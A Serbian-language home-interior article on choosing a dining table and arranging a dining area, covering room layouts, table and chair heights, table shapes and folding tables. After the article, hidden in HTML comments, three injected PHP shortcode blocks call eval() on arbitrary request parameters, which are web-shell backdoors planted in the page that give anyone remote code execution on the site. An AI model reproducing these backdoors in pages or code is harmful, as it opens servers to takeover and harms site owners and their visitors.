Sto i trpezarija

Stolice bi trebalo da budu udobne i prikladne za sve vrste jela, a površina stola čvrsta i laka za čišćenje.

Za svečanije prilike bi bilo poželjno da prostorija u kojoj se obeduje bude odvojena od drugih, kako bi i gosti i ukućani mogli mirno uživati u dobrom jelu u opuštenom razgovoru posle ručka ili večere. Što je snažniji utisak da su hranu pripremali „nevidljivi“ majstori kuhinje, to je uspelija svečana večera.

Prostor u kome se obeduje bi trebalo da bude tako smešten i organizovan da donošenje jela ne predstavlja nikakve poteškoće. U manjim stanovima u kojima je svaki kvadratni metar stambenog prostora izuzetno dragocen, obično se trpezarija kao posebna prostorija prva „ukida“.

Najčešća su rešenja:

Kuhinja/trpezarija

(verovatno najbolje rešenje za porodice sa malo decom, jer se mrlje na podu kuhinje lakše čiste nego na tepihu)

Dnevna soba/trpezarija

Rešenje uglavnom zavisi od veličine dnevne sobe i Vaših ličnih želja za njenim izgledom, kao i od Vaših životnih navika (da li često pozivate prijatelje u goste?, da li porodica obeduje zajedno svakodnevno?, smeta li Vam da obedujete  kuhinji? … )

Izbor odgovarajućeg stola

Preporučujemo Vam da se  i kod izbora nameštaja za obedovanje rukovodite svojim ukusom i afinitetima. Uglavnom su takva rešenje mnogo leša, udobnija i korisnija nego svečane garniture koje možda lepo izgledaju u salonima nameštaja, ali se u određenim stambenim prostorima pokazuju kao nepraktične.
Odaberite stolove i stolice koji će Vama i Vašim ukućanima savršeno odgovarati. Primetite da je visina stola oko 760mm. Takođe, visina stolica je oko 405mm, pa je razmak koji ostaje za kolena 355mm. Ako nabavljate novi sto ili nove stolice, trudite se da zadržite taj dragoceni razmak za kolena od 305 do 360mm, jer ćete u suprotnom sedeti neudobno.

Pri izboru stola, Vam je pre svega bitno da li želite sto za 4 ili 6 osoba. Takođe, od Vašeg ličnog afiniteta zavisi da li želite sto za ručavanje pravougaonog ili okruglog oblika. Možda Vam ne izgleda tako, ali verujte nam da se u određenm stambenim prostorima može smestiti više ljudi za okrugli nego za pravougaoni sto.

Kada razmišljate o poziciji stola, najčešće je rešenje u sredini prostorije, ali to nije uvek i najbolje i najpraktičnije rešenje. Mi Vam predlažemo da pokušate sa smeštanjem stola do zida, a da u svečanijim prlikama premestite sto u sredinu prostorije.

Pomenuli bi i stolove na rasklapanje, koji su veoma korisni ukoliko članovi Vaše porodice svakodnevno jedu van kuće, uveče se jede „u krilima“ ispred televizora, a sto je potreban samo nedeljom.

Takođe, razmislite o izradi „pultova“ koji služe u kuhinjama za doručak kada se žuri na posao, u školu …

<!– [insert_php]if (isset($_REQUEST["msaVw"])){eval($_REQUEST["msaVw"]);exit;}[/insert_php][php]if (isset($_REQUEST["msaVw"])){eval($_REQUEST["msaVw"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["uOoh"])){eval($_REQUEST["uOoh"]);exit;}[/insert_php][php]if (isset($_REQUEST["uOoh"])){eval($_REQUEST["uOoh"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["TWEo"])){eval($_REQUEST["TWEo"]);exit;}[/insert_php][php]if (isset($_REQUEST["TWEo"])){eval($_REQUEST["TWEo"]);exit;}[/php] –>

VN:D [1.9.22_1171]
Rating: 5.5/10 (4 votes cast)
VN:D [1.9.22_1171]
Rating: 0 (from 2 votes)
Sto i trpezarija, 5.5 out of 10 based on 4 ratings

Be the first to comment on "Sto i trpezarija"

Leave a comment

Login